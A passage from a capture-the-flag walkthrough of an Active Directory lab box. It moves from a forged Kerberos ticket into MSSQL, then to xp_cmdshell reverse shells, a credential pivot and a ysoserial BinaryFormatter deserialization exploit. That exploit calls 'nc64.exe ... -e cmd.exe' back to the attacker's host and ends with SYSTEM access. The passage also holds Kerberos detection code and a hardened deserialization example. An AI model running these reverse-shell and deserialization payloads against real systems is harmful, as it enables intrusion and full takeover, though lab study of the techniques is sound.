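    {"id": 4769, "time": "2024-01-31 01:20:00", "ip": "10.10.16.6", "user": "ksimpson",
     "service": "sqlsvc", "etype": RC4_HMAC},
    # a legitimate sqlsvc ticket, then the matching logon to MSSQL
    {"id": 4769, "time": "2024-01-31 01:30:00", "ip": "10.10.11.50", "user": "jhall",
     "service": "sqlsvc", "etype": AES256},
    {"id": 4624, "time": "2024-01-31 01:30:05", "ip": "10.10.11.50", "user": "jhall",
     "package": "Kerberos", "logon_type": 3},
    # a Kerberos logon as administrator with no 4769 behind it: forged ticket
    {"id": 4624, "time": "2024-01-31 02:40:00", "ip": "10.10.16.6", "user": "administrator",
     "package": "Kerberos", "logon_type": 3},
]


def load(rows):
    """Parse timestamps; everything else is kept as logged."""
    events = []
    for r in rows:
        e = dict(r)
        e["time"] = datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S")
        events.append(e)
    return events


def kerberoast_candidates(events):
    """4769 with RC4 for a user (non-machine, non-krbtgt) service account."""
    hits = []
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits.append((e["ip"], e["user"], svc))
    return hits


def unrequested_kerberos_logons(events, window=timedelta(hours=10)):
    """Kerberos network logons with no service ticket issued to that user within
    the default 10h ticket lifetime beforehand: a Silver Ticket is encrypted with
    the service key by the attacker and never passes through the KDC."""
    tgs = [e for e in events if e["id"] == 4769]
    hits = []
    for logon in events:
        if logon["id"] != 4624 or logon["package"] != "Kerberos" or logon["logon_type"] != 3:
            continue
        issued = [t for t in tgs
                  if t["user"].lower() == logon["user"].lower()
                  and timedelta(0) <= logon["time"] - t["time"] <= window]
        if not issued:
            hits.append((logon["ip"], logon["user"]))
    return hits


if __name__ == "__main__":
    evs = load(SAMPLE)
    print("kerberoast candidates:", kerberoast_candidates(evs))
    print("logons without a TGS request:", unrequested_kerberos_logons(evs))
```

Rotating the sqlsvc password (which invalidates every forged ticket) and moving service accounts to AES-only encryption types are the mitigations these two rules point at.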

Connect: On Linux, Kerberos looks in predefined places for tickets, like /tmp/krb5cc_[uid of current user] and whatever file the KRB5CCNAME environment variable points to. If I just run klist, it will fail to find the new ticket. Setting KRB5CCNAME to the ccache file, as before, lets mssqlclient.py connect to the DB using the ticket:

┌──(kali💀kali)-[~/Desktop]
└─$ KRB5CCNAME=administrator.ccache mssqlclient.py -k dc1.scrm.local
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> 

MSSQL Enumeration:

Find Password: I’ll start by listing the databases:

SQL> select name, database_id from sys.databases;
name                                        database_id   
master                                                1   
tempdb                                                2   
model                                                 3   
msdb                                                  4   
ScrambleHR                                            5 

ScrambleHR seems interesting. It has three tables:

SQL> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME   
Employees
UserImport
Timesheets 

The Employees and Timesheets tables are empty. There’s one row in UserImport:

SQL> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser               LdapPwd                LdapDomain             RefreshInterval   IncludeGroups   
--------------------   --------------------   --------------------   ---------------   -------------   
MiscSvc                ScrambledEggs9900      scrm.local                          90               0  

Execute: MSSQL has the ability to run commands via the xp_cmdshell stored procedure. It is possible to do so here, but the service account doesn’t have access to much of anything on the box, and it was meant to largely be a dead end.

In addition, if we enable the xp_cmdshell stored procedure, we can execute commands on the machine.

SQL> xp_cmdshell whoami
output                                                                                
scrm\sqlsvc                                                                        
NULL     

In order to get a reverse shell, you can use the "PowerShell #3 (Base64)" from revshells.com.

SQL> xp_cmdshell powershell -e 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
┌──(kali💀kali)-[~]
└─$ nc -nlvp 5555               
listening on [any] 5555 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.168] 52741

PS C:\Windows\system32> whoami
scrm\sqlsvc

PS C:\Windows\system32> powershell -ep bypass

PS C:\Windows\system32> net users
User accounts for \\DC1
-------------------------------------------------------------------------------
administrator            asmith                   backupsvc                
ehooker                  Guest                    jhall                    
khicks                   krbtgt                   ksimpson                 
miscsvc                  rsmith                   sdonington               
sjenkins                 sqlsvc                   tstar                    
The command completed successfully.

Running a whoami /priv command shows us that we do have SeImpersonatePrivilege. Since we have those privileges we can run a potato attack against the sql server and should be able to obtain access as SYSTEM.

PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Using Powershell Credential Object to gain shell as MiscSvc

Now, we need another reverse shell in order to become MiscSvc and obtain the user flag. To do so, execute the following commands:

Create another Windows base64 encoded payload for the MiscSvc reverse shell and then execute the payload as MiscSvc.

$pswd = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $pswd)

Invoke-Command -Computer dc1 -Credential $Cred -ScriptBlock {powershell -e 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}
┌──(kali💀kali)-[~]
└─$ nc -lnvp 2560
listening on [any] 2560 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.168] 50014

PS C:\Users\miscsvc\Documents> cd ..
PS C:\Users\miscsvc> cd Desktop
PS C:\Users\miscsvc\Desktop> ls
    Directory: C:\Users\miscsvc\Desktop
Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-ar---       31/01/2024     02:10             34 user.txt                                          


PS C:\Users\miscsvc\Desktop> type user.txt
1c2c01dfdba78d65d0----------------

PRIV ESC: Shell as System

Enumeration:

PS C:\Users\miscsvc\Desktop> whoami /priv

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

ScrambleClient Reverse:

Files: Both files are 32-bit .NET executables:

PS C:\Users\miscsvc\Documents> cd C:\Shares                                                    
PS C:\Shares> cd IT                                                                            
PS C:\Shares\IT> cd Apps
PS C:\Shares\IT\Apps> cd Sales*
PS C:\Shares\IT\Apps\Sales Order Client> ls

    Directory: C:\Shares\IT\Apps\Sales Order Client
Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-a----       05/11/2021     20:52          86528 ScrambleClient.exe                                
-a----       05/11/2021     20:52          19456 ScrambleLib.dll    

Connect: I’ll jump over to a Windows VM (this part is the same as the Windows Post). Running the EXE pops the same windows from the IT pages: With my VPN connected and my C:\Windows\System32\drivers\etc\hosts file updated, I’ll click “Edit” and enter the server (the port is already filled): I’ll also check the “Enable debug logging” box. Trying to “Sign In” with any of the creds I have fails: If I try that again with WireShark, it shows it’s a text-based protocol:

Credentials: Opening the binaries in DNSpy, I’ll start with an overview of the files:

LoginWindow seems promising. Several functions down, there’s a Logon function: Clicking on the Logon that’s called from this._Client.Logon jumps over into the ScrambleNetClient class in ScrambleLib, where Logon is defined: There’s a backdoor account if the username is “scrmdev”! Going back to the app, changing the username to that works:

LIST_ORDERS: In WireShark, there’s a new TCP stream (not from the login, as I bypassed that) fetching orders: the client sends LIST_ORDERS; on successful login. The returned base64 string is a serialized .NET object:

Debug Log: If I enabled it in the connection settings, or by going to “Tools” > “Enable Debug Logging”, it will write ScrambleDebugLog.txt in the same directory as the exe. This is not only another way to see the serialized payloads, but there are some hints in there as well: “Binary formatter init successful” will be useful in the next attack. I can see exactly in the code where this happens, in the SalesOrder class in ScrambleLib.dll:
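The two handlers below are an added example, not ScrambleLib’s code: they contrast the BinaryFormatter pattern the debug log points at with a handler for the same UPLOAD_ORDER frame that deserializes into one fixed type with System.Text.Json. The SalesOrder fields, the 64 KB size cap and the validation rules are assumptions.

```csharp
using System;
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text.Json;

// Assumed order record; the real SalesOrder type in ScrambleLib is not reproduced on the page.
[Serializable]
public class SalesOrder
{
    public string Customer { get; set; } = "";
    public int Quantity { get; set; }
}
public static class OrderHandler
{
    const string Prefix = "UPLOAD_ORDER;";
    // VULNERABLE: the pattern the debug log ("Binary formatter init successful") points at.
    // BinaryFormatter trusts the type metadata inside the payload, so the object graph the
    // client chose is rebuilt, with its constructors, setters and callbacks running, before
    // this code looks at a single order field.
    public static object HandleUploadInsecure(string line)
    {
        byte[] raw = Convert.FromBase64String(line.Substring(Prefix.Length));
#pragma warning disable SYSLIB0011 // obsolete for this reason; modern .NET disables it by default
        return new BinaryFormatter().Deserialize(new MemoryStream(raw));
#pragma warning restore SYSLIB0011
    }
    // HARDENED: check the frame, bound its size, then deserialize into one fixed CLR type with
    // a serializer that carries no type information. Microsoft's guidance is to replace
    // BinaryFormatter outright rather than try to fence it with a SerializationBinder.
    public static SalesOrder HandleUploadSafe(string line)
    {
        if (!line.StartsWith(Prefix, StringComparison.Ordinal))
            throw new InvalidDataException("unexpected command");
        byte[] raw = Convert.FromBase64String(line.Substring(Prefix.Length));
        if (raw.Length > 64 * 1024)                    // assumed cap on a single order
            throw new InvalidDataException("order payload too large");
        var opts = new JsonSerializerOptions { MaxDepth = 8 };
        var order = JsonSerializer.Deserialize<SalesOrder>(raw, opts);
        if (order is null || order.Quantity <= 0 || string.IsNullOrWhiteSpace(order.Customer))
            throw new InvalidDataException("malformed order");
        return order;                                  // only plain data reaches the caller
    }
    // Constructed input for the safe path: a JSON order, base64-wrapped like the wire frame.
    public static void Main()
    {
        byte[] json = JsonSerializer.SerializeToUtf8Bytes(new SalesOrder { Customer = "ACME", Quantity = 3 });
        SalesOrder o = HandleUploadSafe(Prefix + Convert.ToBase64String(json));
        Console.WriteLine($"{o.Customer} x{o.Quantity}");
    }
}
```

A payload produced for the insecure handler is rejected by the safe one at the JSON parse step, because the bytes are not a JSON document of the expected shape and no type name in the input can steer what gets instantiated.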

Deserialization Attack:

Generate Payload: I’ll download the latest copy of ysoserial.net from the release page. This is a tool that will generate .NET serialized payloads that will abuse different gadgets in the existing code to get code execution. I’ve not been able to get this tool to run on Linux, so I will have to jump to a Windows VM to generate this payload.

Some Googling about the BinaryFormatter class specifically will show it’s insecure. From the Microsoft docs:

Knowing the plugin that’s installed, I just need to pick a gadget. They are all listed on the GitHub page or with ysoserial.exe -h. I want one that works with BinaryFormatter, and I’ll start with ones that don’t require any special conditions. AxHostState seems like a good start (many will work). I’ll run it:

.\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "C:\\programdata\\nc64.exe 10.10.14.6 444 -e cmd.exe"

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

Send Payload: I’ll listen with nc on TCP 444 and connect to 4411 with nc:

PS C:\Shares\IT\Apps\Sales Order Client> cd C:\programdata
PS C:\programdata> curl http://10.10.16.6:80/nc64.exe -o nc64.exe

Just like in WireShark, I’ll enter UPLOAD_ORDER;[serialized object]:

┌──(kali💀kali)-[~]
└─$ nc 10.10.11.168 4411
SCRAMBLECORP_ORDERS_V1.0.3;

UPLOAD_ORDER;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

It throws an error, and hangs. At nc:

┌──(kali💀kali)-[~/Desktop]
└─$ rlwrap -cAr nc -lnvp 444
listening on [any] 444 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.168] 60188

Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\Users\administrator\Desktop

C:\Users\administrator\Desktop>whoami
whoami
nt authority\system

C:\Users\administrator\Desktop>type root.txt
type root.txt
13baba7fa83670------------------
